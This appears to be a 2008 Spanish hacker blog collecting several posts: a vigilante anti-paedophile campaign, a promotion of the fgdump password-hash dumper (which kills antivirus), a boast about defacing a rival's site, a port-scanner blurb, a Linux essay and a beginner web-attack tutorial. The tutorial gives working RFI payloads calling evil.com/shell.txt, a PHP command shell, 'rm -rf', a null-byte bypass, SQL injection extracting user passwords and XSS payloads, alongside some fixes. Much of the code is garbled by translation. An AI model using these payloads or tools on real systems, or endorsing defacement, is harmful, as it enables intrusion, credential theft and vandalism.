viernes, 30 de mayo de 2008

blood_rec inicia movimiento en contra de la pedofilia y ofensores sexuales en puerto rico

blood_rec En Iniciativa Y En Vista Que Siempre nosotros la comunidad Hacker estamos siempre buscando la manera de ampliar nuestros conocimientos...y fijar un fin nos hemos fijado uno....

Nuevamente Hacer Un movimiento en contra de los ofensores sexuales y pedofilos que hay en la red...

tristemente y dia a dia estos animales perversos crecen en la red y se protegen entre si...nosotros aunque seamos unos pocos nos encaminamos a esto tratar de sacar a estos asquerosos de la red....

sin ofender hay muchos que quieren ser script kiddies y estar defeceando webs por ahi tratando de hacer nombre,.,.,.,pues que mejor manera de atakando a estos individuos y a la misma vez hacerlo por una buena causa....

Nosotros Aqui en ClubHacker en union con H4x0r Securitytrataremos de iniciar este movimiento...solo pedimos colaboracion de ustedes los usuarios que son los que siempre estan por ahi y se encuentran de vez en cuando con estas cosas....

Formato (Que Denuncio?)
  • Pueden notificarnos a nosotros si estubieron en un chat o algo y notaron comportamiento raro o perversor de una persona
  • pueden notificar links a la misma vez que los denuncien en http://www.pedofilia-no.org/ y nosotros nos ocuparemos a nuestra manera.
  • si realmente sienten que fueron ofendidos por una de estas personas sea en el chat o messenger o via email tengan la libertad de notificarnolos pueden hacerlo de manera anonima y nosotros manejaremos de manera prudente y nos ocuparemos de los actos pertinentes.
  • notas usuarios de foros under que recurran a estas actividades...y visitan nuestro u a otros foros notificalo pero con las pruebas pertinentes para banneo imediato..
================================
Formato Notificacion
  • Links No Deben Ser Publicados Se Mandaran Por Privado Al Staff o a este correo notificaciones@clubhacker.org
  • si tienen conversaciones en donde fueron hostigados y de alguna manera maltratados sea por chat o por messenger guarden logs y las envian a el correo y envienlas al correo de info@pedofilia-no.org asi como el de notificaciones@clubhacker.org con sus respectivos logs y la razon por la cual envias el email..
  • el silencio mata no se queden callados y tomen accion sobre esto nosotros estamos dando el primer paso..
  • de ninguna manera si alguien los contacta pidiendole dinero u otra actividad rara de pedir donacion para atacar una web....notifiquenlo al staff del foro de manera imediata...nosotros tomaremos acciones
  • de manera exaustiva nuevamente no se publicaran links,correos,nicks de estas personas en publicos mandelos por privado...persona que no cumpla con este requisito sera amonestada y si incurre nuevamente a tal falta baneado...
  • no tengan ningun problema a dialogar con cualquiera del staff...si fuistes victima de estos actos denuncialo no te quedes callado o notificalo a cualquier miembro del staff nosotros buscaremos la ayuda pertinente que este en nuestras manos yo personalmente me comprometo con eso..
  • si de alguna manera estas siendo victima de estos actos y son de parte de algun familiar cercano,no dejes que se salgan impunes,.,ya que las consecuencias futuras seran aun perores..solo debes pensar en tu futuro y si te lo hacen a ti NO TE AMAN....
  • sea quien sea no debes protegerlo hay leyes que te protegen a ti ...nosotros haremos lo posible que este en nuestras manos para ayudar y si quieres para esto debes ayudarte por ti mismo..
por ahora eso es todo Iremos actualizando este hilo y no te quedes sin hacer nada...

Para Mas Info Por aqui en el blog o a traves de Facebook

salu2

jueves, 29 de mayo de 2008

fgdump 2.1.0 y 1.7.1 Liberado

El cambio más importante de la herramienta es el apoyo ahora de 64 bits metas! Buenas noticias para nosotros.

pwdump6 es un desencriptador de contraseñas en hashes o sea un dumper para Windows 2000 y sistemas posteriores. Es capaz de desencriptar LanMan y NTLM hashes, así como hash de contraseña historiales. Se basa en pwdump3e, y debe ser estable en XP SP2 y 2K3. Si usted ha tenido problemas con otras herramientasviejas, esto debe solucionarlo.

fgdump es una versión más potente de pwdump6. pwdump tiende a colgar y cuandolos antivirus están presente, por lo que fgdump se encarga de que por defecto cierre y después de reinicie una serie de programas AV.. También se puede volcar en caché las credenciales y almacenamiento de artículos protegidos, y se puede ejecutar en una modo multihilo muy fácilmente.

Recomiendo encarecidamente el uso fgdump más que pwdump6, sobre todo teniendo en cuenta que fgdump usa pwdump6 debajo del capó! o sea esta bajo el mismo soft mencionado Obtendrá todo lo que le da pwdump6 y mucho más.

fgdump tiene ahora:

* Mejor detección de 32/64 bits. Esto no es tan fácil como parece, al menos no a distancia! Si alguien tiene un seguro de incendio de manera 100% fiable la detección del Sistema Operativo, por favor hágamelo saber. Por el momento, si no está seguro fgdump, se informe de ello y por defecto a 32-bit.
* Así, por ejemplo, si fgdump tiene una serie de informes como de 32 bits y sabes que es de 64 bits, puede utilizar O-64 (o viceversa, por supuesto). Tenga en cuenta que este indicador se aplicará a todos los hosts que están.. Es posible que desee destacar cualquier hosts que usted necesita para anular.

Así que si todavía estás usando pwdump… NO! Use fgdump.
Descarga De Aqui pwdump
Descarga De Aqui fgdump

Para Leer Mas Sobre Esta Nueva Herramienta Aqui (en ingles)

martes, 27 de mayo de 2008

Los 10 Grandes Fracasos De Google

El buscador es para muchos un sinónimo de éxito, sin embargo en su historia tiene ya proyectos que han sino un sonoro fracaso, tal como describe PCWorld.



La revista estadounidense listó aquellos fracasos más destacados del popular buscador.

Google X

Este site que intentaba presentar las búsquedas con un interfaz semejante al Mac OSX apenas duro un día. Según algunas fuentes Google lo cerró para evitar problemas de Copyright con Apple.

El sitio se mantiene aún online gracias a mirrors que pusieron en marcha algunos usuarios y blogs relacionados con la comunidad Apple.

Google Catalog

Llegó en plena fiebre de los sitios comparadores de precios y desde su lanzamiento está en beta permanente. Su uso es todo un suplicio debido a los constantes errores de enlaces que no funcionan o los resultados que ofrece que en nada tienen que ver con un comparador de precios.

Google Video

El buscador no quiso quedar al margen de la fiebre que por el video se expandió en la red. Desde su lanzamiento este servicio ha pasado por todo tipo de cambios. Primero se precisaba de un aplicativo que se instalaba en el ordenador del usuario para poder ver los videos almacenados. Después quiso convertir el portal en una nueva TV, sin conseguirlo y finalmente se sumó a la moda Youtube facilitando el intercambio entre los usuarios.

Ante el fracaso de todas estas iniciativas, Google compró Youtube para liderar ese mercado.

Acelerador Web

Fue otro de esos proyectos que prometían revolucionar la navegación online. Desde su lanzamiento, los activistas en defensa de los derechos de los usuarios denunciaron esa herramienta que ponía en peligro la privacidad de los usuarios.

La realidad es que con la extensión de la banda ancha esta herramienta apenas tenia sentido. Según Google, que aun lo ofrece, los usuarios que usan esta herramienta reducen en un 20% el tiempo de carga de las páginas web.

Google Answers

Aunque su uso durante un tiempo ofrecía resultados excelentes, al ser de pago nunca pudo competir con Yahoo! Answers, basado en la enorme comunicad de usuarios del popular portal.

Desde ya tiempo, Google Answers ya no acepta nuevas preguntas.

Búsqueda por voz

El Google Voice Search fue lanzado en el 2003 y debido a la complejidad del proceso nunca consiguió arrancar con éxito.

Google Viewer

Una mezcla de Snap con powerpoint ofrecía este novedoso servicio de Google que permitía al usuario con una simple mirada conocer los contenidos de un sitio.

El proyecto fue abandonado pero existen algunos plugins para Firefox que aprovechan que lo integran

Google Checkout

Los directivos de Google estuvieron a punto de protagonizar una guerra abierta con eBay cuando lanzaron Google Checkout como alternativa a PayPal.

La guerra fue proclamada durante una fiesta en junio del 2007 coincidiendo con la conferencia anual de clientes de eBay.

Los directivos de eBay eliminaron de inmediato la publicidad en Google lo que ocasionó una fuerte crisis en el buscador teniendo en cuenta que el portal de subastas era, en esa época, el primer anunciante.

La crisis duró una semana, tiempo suficiente para que Google recapacitara y diera carpetazo al proyecto.

Orkut

Con la fiebre de las redes sociales profesionales, Google lanzó Orkut (también lo hizo Yahoo). Salvo en Brasil, donde consiguió un éxito enorme, Orkut paso del todo desapercibido por la mayoría de los internautas y eso que contó con el apoyo de la incipiente comunidad bloguera del 2004 que hizo de Orkut su “red social”.

Es cierto que junto a estos “fracasos”, también Google ha cosechado grandes triunfos. Sin embargo, salvo aquellos más directamente vinculados con su negocio de búsquedas y de publicidad online es difícil encontrar proyectos que hayan sido exitosos.

Fuente: Aqui

Google le dice si un sitio es seguro

¿Son seguros los sitios que visitamos?. Google agregó una útil herramienta que permite examinar cualquier dominio para comprobar esto. Lo curioso del caso es que en algún momento, la propia utilidad detectaba al dominio de Google como anfitrión de códigos maliciosos.

Aunque ello ya no ocurre, algunas investigaciones revelaron que los problemas no derivan de www.google.com, sino de video.google.com.

Las mismas se basan en 265,674 páginas examinadas en el sitio, durante los últimos 90 días. De ellas, solo 4 instalaron alguna clase de software malicioso sin el consentimiento del usuario. La última vez que Google visitó ese sitio fue el 23/05/2008, y la última vez que se encontró contenido sospechoso fue el 13/03/2008.

El malware incluía 4 exploits en forma de scripts y 4 troyanos que eran descargados de las páginas comprometidas.

La herramienta no está disponible de forma directa al usuario, salvo en la forma que indicamos abajo. Parece ser parte de un API que permite la navegación segura (Safe Browsing API), un API experimental que permite a las aplicaciones cliente, comprobar una URL en una lista negra actualizada regularmente por Google.

La lista la integran sitios sospechosos de phishing o malware. Cualquier aplicación cliente puede utilizar esta API. De allí en más, se puede advertir a los usuarios antes de hacer clic en enlaces que llevan a sitios maliciosos, evitar que se publiquen páginas de phishing, etc.

Actualmente el API es utilizado en las versiones betas de Firefox 3.

Si usted es curioso acerca de algunos sitios web, puede utilizar la herramienta, agregando el dominio del sitio que desea comprobar al siguiente URL (después de "site="):

http://www.google.com/safebrowsing/diagnostic?site=

Por ejemplo, para saber si VSAntivirus es malicioso:

http://www.google.com/safebrowsing/diagnostic?site=vsantivirus.com


Fuente:

Google hosting malware? Google says they were!
http://blogs.zdnet.com/Google/?p=1053


Relacionados:

Does a Site Have Malware? Google Provides Diagnosis
http://blogoscoped.com/archive/2008-05-23-n62.html

Browser.safebrowsing.malware.reportURL
http://kb.mozillazine.org/Browser.safebrowsing.malware.reportURL

Google Safe Browsing API
http://code.google.com/apis/safebrowsing/

Fuente: Aqui

domingo, 25 de mayo de 2008

Deface Al lamers.killer (r0ot o Lo0p)

Bueno como ya saben en foros siempre hay usuarios que preguntan,como hackeo esta pagina...como defeceo este foro etc,etc,etc....

yo siempre les recomiendo La ing social es la mejor arma despues vienen las otras...sea scanners que no me gustan o las demas que usen bah...

esta vez le toco a lamers.killers mejor como conocido en la escena del under como r0ot o su otro seudomino de lo0p del team KHT,aparte que a su mamon administrador ya yo lo habia defeceado 2 veces xD cosa que no acostumbro hacer por motivos vengativos,siempre lo hago politicamente ahora le toco a su mamon....

este individuo lo0p todo un lammo de primera monto una web similar a la de lammos.com pero en este caso lamifera xD.....la web era un blogger de estos y en ella tenia foro y todas esas mierdas...

el caso que el bien lammo se agregaba en los msn anunciando sus bobadas y un dia se agrega al mio indicandome que me iba a agregar en la lista de la web xD....

pero a la misma vez que hablaba conmigo vino killer-kitana y lo defeceo jajajaja.....

yo hice amistad con el (iluso y panchito) y hice una cuenta de soporte xD (La Idea me la dio Knet)y con buena ing social me hice de la web...no conforme con eso tambien la web de su bobo administrador k4xsul xD (RFI)....

no acostumbro a defecear por mierdas pero no me dejastes mas remedios bobo de mierda
KHT Team defeceados.... y lamers.killers xD (lo0p)


www.antrax1337.com.ar

pronto los logs para que se meen de la riza .....

eres mierda hermano antes de agregar gente a tu lista agregate a ti mismo.....

aparte que tu gran maestro cascanola es el mas lamo de todos pero que se les puede hacer si dime con quien andas y te dire quien eres....
salu2 Wink

sábado, 24 de mayo de 2008

Amap Scanner de Puertos Y S.O (Util Para El Hacking

otro escaner de puertos y deteccion de sistemas operativos. Pero desde los servicios corriendo en una máquina puede obtener una buena idea del sistema operativo y el propósito del servidor.

Se trata de identificar las aplicaciones aun cuando se estén ejecutando en un puerto diferente de lo normal. Esto se logra mediante el envío de paquetes de activación, y buscar las respuestas en una lista de cadenas de respuesta.

Sin cubrir las bases de datos con factores desencadenantes y las respuestas, la herramienta es inútil, a los autores les gustaría ayudar a llenar la base de datos. Cómo hacer esto? Bueno, cada vez que una aplicación cliente se conecta con el servidor, algún tipo de apretón de manos se intercambia (al menos, por lo general. Syslogd, por ejemplo, no dicen nada, snmpd y sin el derecho ni la cadena de comunidad). De todos modos, AMAP toma el primer paquete enviado de vuelta y la compara con la lista de la firma respuestas. Muy simple, realmente. Y en realidad, resulta ser realmente así de sencillo, al menos, para la mayoría de los protocolos.

Actualmente hay dos instrumentos para este fin: AMAP, y nmap - Ambos tienen sus puntos fuertes y débiles, ya que desplegar diferentes técnicas. Se recomienda utilizar ambos instrumentos para la identificación reliabe.

Las nuevas versiones de nmap también tienen una bandera acaparamiento de función.

Puede descargar aquí AMAP (codigo fuente)...

miércoles, 21 de mayo de 2008

Distribución de Linux de preferencia Por que elegir Linux

Distribución de Linux de preferencia

Por supuesto que hay muchos diferentes Distros De Linux a su disposición, es decir, Debian, Gentoo, Red Hat, Fedora, SuSE, etc, todos son muy buenas opciones, ya que todos evitan la aplicación de un núcleo de Windows (por supuesto, otra cosa que Windows normalmente es una sabia elección). Pero, ¿dónde comenzar a la hora de decidir qué distribución de Linux que es mejor para mí? En primer lugar, algunas cosas deben ser explicadas. En primer lugar, lo que es Linux? Linux es un derivado de UNIX, (desarrollado por Bell Labs) de Linus Torvalds, por lo tanto, el "Lin" y luego la "ux" que representa la parte de UNIX. En términos de la actual codificación, el núcleo de Linux (o núcleo, el corazón del sistema operativo) fue escrito en su mayor parte en C89, C. ¿Por qué la gente prefiere Linux sobre Microsoft, y ¿por qué debería yo deberia migrar a un sistema operativo de extranjeros ? Linux es libre en general (menos ciertas distribuciones, como Novell Suse) es de código abierto. El código abierto significa que el código fuente (pre-compilación donde todo está en binario), está abierto a la comunidad a modificar0, y hacer "mejor" si lo desean, a pesar de que no podrá tomar todo el crédito, tienen que seguir ciertas normas, etc (GNU, o lo que has). La razón la mayoría de las personas emigran es evitar una de las muchas cosas. El primer pensamiento que viene a la mente que primero golpea la conversación es la idea de que es gratis, y la mayoría del software que se instala es libre también. Luego viene la fiabilidad y la estabilidad argumento, que carecen de nombre de Microsoft de que algunos extremistas considerar la tiranía (este es un rant) el apoyo masivo, y la velocidad de la computación. Creo que es necesario pasar por cada ejemplo un poco poco más a fondo, comenzando con la idea de "software libre".

Libre:

La idea de "freeware" o "shareware" se ha mantenido en torno siempre, pero no donde cerca del extremo que es el desarrollo de Linux. Casi todos los proyectos que están abiertos a la comunidad son realmente libre de utilizar, y manipular. La idea de no ser obligado a una empresa de software es siempre un agradable pensamiento (véase el artículo "DRM - el punto de vista ético").

La fiabilidad / estabilidad:

Dado que el núcleo de Linux está en constante revisión, y sometidos a prueba por una gama tan amplia de personas que son las contribuciones que se están realizando constantemente (al igual que la mayoría de software de fuente abierta proyectos) que permite a más ojos para ver lo que está sucediendo, y más gente a "prueba leer "el código, y un mayor número de personas a probarlo, etc Por lo tanto, esa mentalidad alienta la idea de estabilidad y un rendimiento superior, que a software de código cerrado donde sólo ciertos individuos que trabajan para la empresa que puede ver el código. Por otra parte, el idioma más eficiente (en mi opinión, de todos modos) se usa para programar el núcleo, y recompilado para montaje en el sistema operativo inicial, etc (se hace referencia a "¿Cómo el microprocesador trabaja" artículo para más información).

Microsoft carece de etiqueta:

Ahora bien, todos sabemos que muchas personas (lamentablemente) cambiar a Linux / UNIX exclusivamente para el propósito de "look cool" o simplemente a apartan de la manada por motivos que se desconocen son / más probable es tonto. Sí, creo que darse cuenta de que gran cantidad de gente esté en desacuerdo conmigo, con tal precipitada generalización, pero el hecho sigue siendo, y lo mismo sucede con mi experiencia con muchas personas que actúan como tales. Sin embargo, para seleccionar los pocos que rechazar de Microsoft, o cualquier empresa que desee cargar obsceno cifras de software que es muy poco diferente a la última, esto es cuando la gente hace su movimiento (o "movimiento"). Por supuesto el software de Microsoft tienen sus "up's", así como muchos "de abajo", aunque hay que admitir, ya que la mayoría de las empresas han separaron para el desarrollo de sus juegos y programas informáticos para Windows, que hacen mantener la cuota de mercado (sobre todo el gran apoyo de directx , Mientras que Linux tiene soporte para OpenGL, con la excepción del uso de Wine). Pero con la falta de los gastos en software, y la falta de una "etiqueta" de una empresa, me parece que hay mucha más libertad, y "Movimiento Masivo" si se quiere para el promedio del usuario final, todo el camino a un programador, o el administrador del sistema.

Soporte:

Contrariamente a la creencia popular, hay una enorme comunidad de personas que participan en línea para ayudar con el desarrollo, problemas, o lo que tienen con cualquier persona que busca conocimientos en el ámbito de Linux. Aunque la distribución de lo que usted está teniendo dificultades, hay algunas comunidades, como foros de sitio fuera allí para ayudarle, y cualquiera que sea extraño error que está recibiendo, ha sido publicado en alguna parte, junto con toda probabilidad una resolución.

Velocidad:

Ah, me huele otra ra (n) t acercando. Bien, pues entendemos que el núcleo de Linux está escrito en la forma más eficiente, ya que es ampliamente la prueba de lectura, etc lo que lo hace funcionar mucho mejor que Windows? Bueno, hay muchas razones, además de pura codificación, pero la arquitectura. Simple razones tales como el sistema de archivos (Linux ext2, ext3, etc nunca necesitan ser defragmentado, en virtud de la forma en que los sistemas de ficheros se crean) la falta de un registro (un atroz diseño de Microsoft que incluye demasiados vulnerabilidades, pero este es un rant) la forma en que el kernel está compilado en cada arranque (Gentoo), entre muchas otras ideas o diseños brillantes. Estas son sólo algunas ideas, y muchos se quedan fuera.

Ahora, para la teoría, por favor, tome esto como un grano de sal. Entre Intel y Microsoft, me parece una línea de tendencia que ha estado en las obras durante muchos años. Alguna vez notó que el más simple de software requiere más memoria que decir si se hiciera unos años antes? Observe también cómo lo hace Linux puede correr en una máquina de 300Mhz sin problemas? Esta es la razón por la gente llama Microsoft "bloatware." Se ha especulado en numerosas ocasiones que Microsoft tiene un acuerdo con, oh decir, de Intel. Si Microsoft hace más "boludeces" de alta intensidad de recursos de software, entonces Intel será capaz de desarrollar más "pesado" más intrincadas de software para apoyar la mencionada bloatware. Por lo tanto, ambas empresas hacen un buen maravilloso beneficio(para ellos). Si nada más, esto sería una clásica táctica de negocio que puede ser abstracta que se encuentran en otros escenarios. Yo les permitire especular el resto.

Es importante tener en cuenta la razón por la cual deseo de hacer el cambio, es una de las razones antes mencionadas, o puede hacer su propio caso?

En el sector de la critica del artículo (o si nada más, ¿por qué usted está más probable es que este leyendo, para escuchar mi opinión). Como se mencionó anteriormente, hay cientos, si no miles de distribuciones de Linux disponibles, y cada sabor se adapta a cada bien. Todo depende de lo que desea hacer. Como practicar la seguridad de la red auditor, creo que Gentoo es la mejor "Distro" de elección Además el hecho de que es recomendado por Kevin Mitnick, Me parece que esto es lo más limpiamente escrito básico. Se proclama eficiencia, la seguridad (pseudo BSD) y da mucho margen para la optimización / configuración tras la instalación. Es casi como si se dan todas las piezas de automóviles, y pidió a construir su sueño de automóviles; todo lo que se necesita es un poco de inteligencia. Gentoo es libre, tiene mucho soporte en línea (aunque los foros no siempre consisten en la ayuda que nesesita, pero en su mayor parte es bueno) y muy eficiente. Teniendo en cuenta el hecho de que el kernel está compilado cada vez que entre cada arranque, y adaptados específicamente para su hardware determinado, esto es, con mucho, un hombre entre los hombres de sistemas operativos. Me parece que es muy seguro el sistema operativo, teniendo en cuenta la configuración de la red que está disponible a pre-instalación - las opciones parecen ser prácticamente ilimitadas.

Si uno no se siente como la compilación de Gentoo, o lo que usted, nunca miedo, Sabayon está aquí. Sabayon es una distribución de un pre-compilado versión de Gentoo, donde tras la instalación, se optimiza el software en el que mejor se adapte a su hardware para que usted, entre muchos otros "retoques" aquí y allá, por lo que resulta bastante eficaz. No sólo Sabayon vienen "envasados" si se quiere con todo el software del deseo, que pueden incluir o excluir cualquiera que sea el software que usted por favor a la instalación con un soporte de fácil instalación GUI. En términos de entorno gráfico, puede elegir entre KDE, Gnome, o Fluxbox. Desde el punto superficial, es bastante similar (configuración y entorno) a cualquier otra distribución de Linux que no requiere grandes cantidades de línea de comandos de configuración, similar a Ubuntu, Knoppix, Open Suse, y así sucesivamente.

Al fin y al cabo, no hay una distribución que es derecho de todos, pero uno puede tener cualquier duda, distribución, y que se convierta en su propio, para satisfacer sus necesidades. Sin embargo, todos los que he dado es mi mera opinión, sin embargo, pueden tener lo que deseen. Por suerte, me han ayudado a algunos individuos optimizar su distribución, y por qué Linux puede ser una buena opción para ellos (o tal vez no). ¡Buena suerte, feliz y compilar!

- leetupload Crew

martes, 20 de mayo de 2008

Introduccion a Ataques Aplicaciones webs (Nivel Novato)

Introduccion a Ataques Aplicaciones webs (Nivel Novato)

--= WebHacking --

-= Intro -
en este tutorial, vamos a discutir las vulnerabilidades, y qué va mal con el server, y algunas formas de explotar ...
Disfrute!

Tutorial: [Básico | | 1]

+------------------------------------------+
|
| | Principiantes | |
|
+------------------------------------------+

Cosas a saber:

Vulnerabilidad: un agujero de seguridad puede ser explotado para cambiar la forma en que el webapp / software / funcione.

=- CMS, Foros utilizan bases de datos para almacenar la información como usuarios, los puestos, los hilos, mensajes y así sucesivamente, por lo general su / la mayoría de un servidor MySQL.

=- RFI [Inclusión del fichero remoto]: un usuario malicioso puede incluir una "mala aplicacion" o código a ser ejecutado en el sitio vulnerable.

=- LFI [Inclusión de archivos locales]: un usuario malicioso puede abrir cualquier archivo en el servidor.

=- SQL Inyección: La inyección de una consulta MySQL para eludir o recibir más información de una base de datos.

=- [Cross Site Scripting]: si se trata de una vulnerabilidad permanente, donde los usuarios se guarda la entrada, el usuario puede acceder cookies, IP, y mucho más ...

=- Exploit: un script para usar maliciosamente ante una vulnerabilidad.


+------------------------------------------+
| | ¿Qué va mal | |

+------------------------------------------+
. Vamos a tomar cada vulnerabilidad, y tomar un look a lo que va mal con el desarrollador web, que ha hecho el script vulnerable ...

=- RFI::
RFI's son explotados mediante la inclusión de un codigo malicioso desde otro sitio, a los sitios vulnerables, por ejemplo, puedes incluir una PHP-Shell, y ejecutar comandos en el servidor usando ...
. esta vulnerabilidad es muy peligrosa, un sitio vulnerable se puede comprometer fácilmente ...

un ejemplo de un código infectado con un RFI:


$page = $_GET['page']; $ page = $ _GET [ 'page'];

if (isset($page)) if (isset ($ pagina))
{ (
include($page); include ($ page);
} )

?> >



como pueden ver, estamos tomando la variable de la página y, entre ellos, ahora que el script trabajo y hacer lo que está supuesto a hacer, por ejemplo:

www.example.com/index.h4x?page=contact.h4x

esto abriría contact.h4x, pero lo que un usuario malicioso hacer?

www.example.com/index.h4x?page=http://www.evil.com/shell.txt?

la extension del código debe estar en un archivo txt, porque de esta manera el código será analizada y ejecutada en el sitio vulnerable.

--- que pasa entonces?


$page = $_GET['page']; $ page = $ _GET [ 'page'];

if (isset($page)) if (isset ($ pagina))
{ (
include('http://www.evil.com/shell.txt?'); include ( "http://www.evil.com/shell.txt?");
} )

?> >





el archivo de texto que se incluyó, por lo que digamos los shell.txt tuvo el siguiente código:


$command = $_GET['cmd']; $ comando = $ _GET [ 'cmd'];

if ($command) if ($ comando)
{ (
@system($command); @ sistema ($ comando);
} )
echo " echo "



"; ";

?> >




un pequeño cuadro de texto aparecera en la página, con un botón, que ejecuta comandos ... the el usuario puede comprometer la totalidad del sitio usando este sencillo cuadro de texto, si hubiera suficientes privilegios

rm -rf rm-rf

y borrar los archivos ...

algunos desarrolladores, creen que pueden arreglar la vulnerabilidad de la siguiente manera:


$page = $_GET['page']; $ page = $ _GET [ 'page'];
$page = $page . $ page = $ página. ".php"; ". php";

if (isset($page)) if (isset ($ pagina))
{ (
include($page); include ($ page);
} )

?> >





de esta manera, sólo se puede incluir.archivos php, y que no es realmente una gran causa que PHP se analiza en el lado del servidor ...

pero, que acostumbra dejar a algunas personas, hay algo llamado NullByte, que simplemente decirle a PHP para hacer caso omiso de cualquier cosa después de que ... si alguien quería aprovechar ese código, que haría:

www.darkmindz.com/index.h4x?page=http://www.evil.com/shell.txt? www.darkmindz.com/index.h4x?page=http://www.evil.com/shell.txt? 00%

como se puede ver, el [00%] es la NullByte, que se analiza de esta manera:


$page = $_GET['page']; $ page = $ _GET [ 'page'];
$page = $page . $ page = $ página. ".php"; ". php";

if (isset($page)) if (isset ($ pagina))
{ (
include('http://www.evil.com/shell.txt?'); // ignoring anything after the NullByte, which is in this case, the .php... include ( "http://www.evil.com/shell.txt?"); / / ignorar nada después de la NullByte, que es en este caso, el. php ...
} )

?> >





por lo que la cuestión ahora es cómo garantizar por completo este sistema de URL?

así, puede usar un interruptor declarador, y de esta manera, cualquier cosa distinta de lo que ya se ha dicho, no será incluido .. por ejemplo:


if(isset($_REQUEST['page'])) if (isset ($ _REQUEST [ 'página']))
{ (
switch ($_REQUEST['page']) { switch ($ _REQUEST [ 'página']) (

case 'about': caso 'sobre':
include('about.php'); // if the page was about, get the about.php contents... include ( "about.php '); / / si la página se acerca, about.php obtener el contenido ...
break; break;

case 'contact': caso "Contacto":
include('contact.php'); // and so on :) include ( 'contact.php'); / / y así sucesivamente:)
break; break;

default: por defecto:
include('index.php'); // the default page to include, if the page variable was not found, or it was a hack attempt :) include ( 'index.php'); / / la página por defecto para incluir, si la variable de página no encontrada, o se trataba de un intento de cortar:)
break; break;

} )

} )


?> >





es un sistema perfecto, simple y seguro, y funciona:)

ahora que se hace, RFI, es como LFI, nada es diferente, pero el hecho de que sólo el LFI se encuentra en las páginas del servidor, la mayoría de las veces descargar scripts están infectados con el LFI, causa que se hacen a readfile (); sea cual sea es xD .. Solo es mal codeo xD.



Ahora NOS desplazamos a las inyecciones de SQL, esas son mortales cuando los sitios de comercio electrónico están infectadas con ellas!

un usuario malicioso podría explotar un código de inyeccion sql, para eludir un formulario de autentificación, y la tabla de mysql como admin.

o mediante la inyección de la URL para que pueda ejecutar la consulta de MySQL, lo que le permitirá acceder a información de los usuarios, y así sucesivamente ...

ejemplo de código vulnerable:


$host = "localhost"; $ host = "localhost";
$user = "root"; $ user = "root";
$pass = "r00t"; $ pass = "r00t";
$db = "banks"; $ db = "bancos";

mysql_connect($host, $user, $pass); mysql_connect ($ host, $ usuario, $ pass);
mysql_select_db($db); mysql_select_db ($ db);

$id = $_GET['id']; $ id = $ _GET [ 'id'];

if (isset($id)) if (isset ($ id))
{ (
$query = mysql_query("SELECT * FROM `news` WHERE `id` = $id"); $ consulta = mysql_query ( "SELECT * FROM` noticias `EN` `id = $ id");
if ($query) if ($ consulta)
{ (
while($news = mysql_fetch_array($query)) while ($ noticias = mysql_fetch_array ($ consulta))
{ (
echo $news['news']; echo $ noticia [ 'noticia'];
} )
} )
} )

?> >





ahora, como pueden ver, toma el 'id' variable, y la consulta, sin filtros

ahora si queres inyectar, i en primer lugar, para comprobar la vulnerabilidad ....: haciendo lo siguiente:

www.example.com/page.php?id=1 OR 2 www.example.com/page.php?id=1 O 2

elemental y explicado milesima de veces pero aveces o para los nuevos vale recalcarlo

SI 2 noticias estaba allí, entonces eres afortunado:(o sea en la tabla) D, y aquí viene la parte buena, cuando la información se extrae, mediante un comando UNIÓN, i puede seleccionar de otra columna, y el eco que allí ...

para hacer una inyección sería el siguiente:

www.example.com/page.php?id=1 OR 2 UNION SELECT name,1,password,email FROM users

ahora en función del número de filas en la columna de noticias, i tendrá que cambiar el número de filas seleccionadas ...

por lo que ahora sabremos lo que salió mal, seguro que permite inyecciones!





$host = "localhost"; $ host = "localhost";
$user = "root"; $ user = "root";
$pass = "r00t"; $ pass = "r00t";
$db = "banks"; $ db = "bancos";

@mysql_connect($host, $user, $pass); // adding the @ sign will make it error free, no errors is shown if the DB couldnt be selected or connection refused @ mysql_connect ($ host, $ usuario, $ pass); / / añadir el signo @ se hará libre de errores, los errores no se muestra si el PP podría ser seleccionado o conexión rechazada
@mysql_select_db($db); @ mysql_select_db ($ db);

$id = (Int) $_GET['id']; // now we are telling PHP that id is an Integer, do not process anything else.. $ id = (int) $ _GET [ 'id']; / / ahora estamos diciendo que PHP id es un número entero, no proceso de cualquier otra cosa .. ;) ;)


if (isset($id)) if (isset ($ id))
{ (
$query = mysql_query("SELECT * FROM `news` WHERE `id` = $id"); $ consulta = mysql_query ( "SELECT * FROM` noticias `EN` `id = $ id");
if ($query) if ($ consulta)
{ (
while($news = mysql_fetch_array($query)) while ($ noticias = mysql_fetch_array ($ consulta))
{ (
echo $news['news']; echo $ noticia [ 'noticia'];
} )
} )
} )
?> >





es decir, este código es seguro/.............. ...
====================================
ahora nos desplazamos a XSS, no es realmente un gran problema si no es algo curioso!

ejemplo de XSS sería en un libro de visitas, comentarios, formularios de contacto, listas de correo, etc ..

que puede el usuario malicioso hacer?

puede usar un javascript para cambiar el título, formas, precios, datos ocultos, las páginas, las acciones, y peor aún, acceder la página!
algunos CMS y Foros, utilizan las cookies y los usuarios almacenar la información de ellos, si ese sitio es vulnerable a XSS, el atacante puede obtenerprivilegios de administrador de la tabla de administradores en las/o con las cookies ...

un codigo vulnerable sería el siguiente:


$message = $_POST['message']; $ mensaje = $ _POST [ 'mensaje'];

if (isset($_POST['message'])) if (isset ($ _POST [ 'mensaje']))
{ (

echo "Thank you, your message has been posted!"; echo "Gracias, tu mensaje ha sido publicado!";

echo "
"; echo "
";

echo $message; echo $ mensaje;
} )

echo " echo "



"; ";

?> >




ok, por lo que ahora un usuario malicioso podría hacer lo siguiente:

presentar el siguiente texto para probar la vulnerabilidad:

alert("xss") alert ( "XSS")

or o

Nice Website! Niza sitio web


Si el HTML se analiza "y que en el presente Código", el atacante pasará ahora al siguiente paso, en la tabla de la página .. redireccionando a un logger ..

algunos métodos de saltar algunos filtros, por ejemplo, si el formulario sólo presenta enlaces, permite tomar éste como un ejemplo:


$message = $_POST['message']; $ mensaje = $ _POST [ 'mensaje'];

if (isset($_POST['message'])) if (isset ($ _POST [ 'mensaje']))
{ (

echo "Thank you, your link has been added!"; echo "Gracias, su vínculo se ha añadido!";

echo "
"; echo "
";

echo "Link";; echo " Link ";
} )

echo " echo "



"; ";

?> >





ahora que no se debe analizar nada, sino simplemente envuélvalo en un enlace derecho?

Bueno, no lo creo, simplemente puede eludir usando:

'> alert("owned") '> Alert ( "propiedad")


¿por qué que lo salta?

lo que sucede, es

'> '>

se detendrá una etiqueta y, a continuación, puede abrir cualquier otra cosa ...

aquí está el resultado:

alert("owned")'>Link alert ( "propiedad") "> Vínculo




como pueden ver, la etiqueta tiene unas > cerradas, que me permitió abrir otra etiqueta, que es un script y funciona:)


+------------------------------------------+
| | FIN | |
+------------------------------------------+

